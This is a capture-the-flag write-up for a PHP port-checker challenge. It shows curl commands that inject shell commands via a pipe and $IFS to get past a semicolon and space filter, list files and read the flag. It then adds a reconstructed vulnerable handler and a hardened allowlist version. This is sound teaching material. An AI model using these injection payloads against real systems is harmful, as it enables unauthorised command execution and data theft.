Social Checker
Challenge:
Social Checker - check if your favourite social media site is online!
http://46.101.107.117:2103
Solution:
After visiting the challenge URL I was presented with a pulldown list of Social Media services and a Check It! button, which appeared to conduct a port check and return the results:
I viewed the HTML source to determine what action the submit button performed and found that a PHP script was called and passed a url form field:
<script>
function doCheck() {
$.post("check.php", {"url": $("#url").val()}, function(data) {
$("#result").text(data);
});
}
</script>
My next step was to recreate the same form POST with curl to make it easier to manipulate the form data:
$ curl -X POST -d 'url=twitter.com' 'http://46.101.107.117:2103/check.php'
twitter.com (104.244.42.129:80) open
I submitted junk data for the url value as an attempt to invoke an error condition, which revealed that netcat was being called by the PHP script:
$ curl -X POST -d 'url=junk' 'http://46.101.107.117:2103/check.php'
nc: bad address 'junk'
I spent some time testing various methods for including additional parameters and shell commands to achieve remote command execution and found some humorous messages when specific characters weren't allowed. For example, including a semi-colon produces a YouTube link to a montage of Consuela from Family Guy saying, "No", and using whitespace results in a YouTube link to the song Out Of Space by The Prodigy.
$ curl -X POST 'http://46.101.107.117:2103/check.php' -d 'url=localhost;ls'
nice try - www.youtube.com/watch?v=MF283pORG2E
I was able to work past the character restrictions using a pipe (|) instead of a semi-colon and the Internal Field Separator shell variable ($IFS) in place of a space:
$ curl -X POST 'http://46.101.107.117:2103/check.php' -d 'url=localhost|ls$IFS.'
ls: 80: No such file or directory
.:
bg.jpg
check.php
flag.txt
index.php
After a bit more testing I was able to create a payload to dump the flag file:
$ curl -X POST 'http://46.101.107.117:2103/check.php' -d 'url=localhost|cat$IFS./flag.txt'
he2021{1ts_fun_t0_1nj3kt_k0mmand5}cat: can't open '80': No such file or directory
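To make the root cause concrete, here is an added example that is not the challenge's actual check.php (which was never shown): a reconstruction of the denylist-style filter the responses suggest, beside a hardened handler that validates the hostname against an allowlist and launches netcat without a shell. The `nc -zv <host> 80` command line is an assumption inferred from the "(ip:80) open" and "ls: 80: ..." output.

```php
<?php
// Added example, reconstructed from the behaviour observed above; the real
// check.php was never shown. The "nc -zv <host> 80" command line is assumed
// from the "(ip:80) open" and "ls: 80: ..." output.
// Denylist-style filter, as the responses suggest: rejects ';' and whitespace
// but says nothing about '|' or '$', so "localhost|ls$IFS." gets through.
function denylist_allows(string $url): bool {
    return strpos($url, ';') === false && !preg_match('/\s/', $url);
}

// VULNERABLE: the raw value is interpolated into a shell command line.
function check_vulnerable(string $url): string {
    if (!denylist_allows($url)) {
        return "nice try";
    }
    return (string) shell_exec("nc -zv " . $url . " 80 2>&1");
}

// Allowlist: only a syntactically valid hostname (RFC 1123 labels) is accepted.
function is_hostname(string $url): bool {
    $label = '[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?';
    return strlen($url) <= 253
        && preg_match('/^(?:' . $label . '\.)*' . $label . '$/i', $url) === 1;
}

// HARDENED: validate first, then hand nc an argument array (PHP >= 7.4) so no
// shell ever parses the value; '|', '$IFS' and friends are just literal bytes.
function check_hardened(string $url): string {
    if (!is_hostname($url)) {
        return "invalid hostname";
    }
    $spec = [1 => ['pipe', 'w'], 2 => ['pipe', 'w']];
    $proc = proc_open(['nc', '-zv', $url, '80'], $spec, $pipes);
    if (!is_resource($proc)) {
        return "check failed";
    }
    $out = stream_get_contents($pipes[1]) . stream_get_contents($pipes[2]);
    fclose($pipes[1]); fclose($pipes[2]);
    proc_close($proc);
    return $out;
}

// Run the page's inputs through both filters (CLI only; no connections made).
if (PHP_SAPI === 'cli') {
    foreach (['twitter.com', 'junk', 'localhost;ls', 'localhost|ls$IFS.'] as $in) {
        printf("%-20s denylist=%s allowlist=%s\n", $in,
            denylist_allows($in) ? 'pass' : 'block', is_hostname($in) ? 'pass' : 'block');
    }
}
```

The CLI loop shows the pipe/$IFS payload passing the denylist but failing the hostname allowlist; `check_hardened()` additionally never builds a command string, so there is no shell for metacharacters to reach.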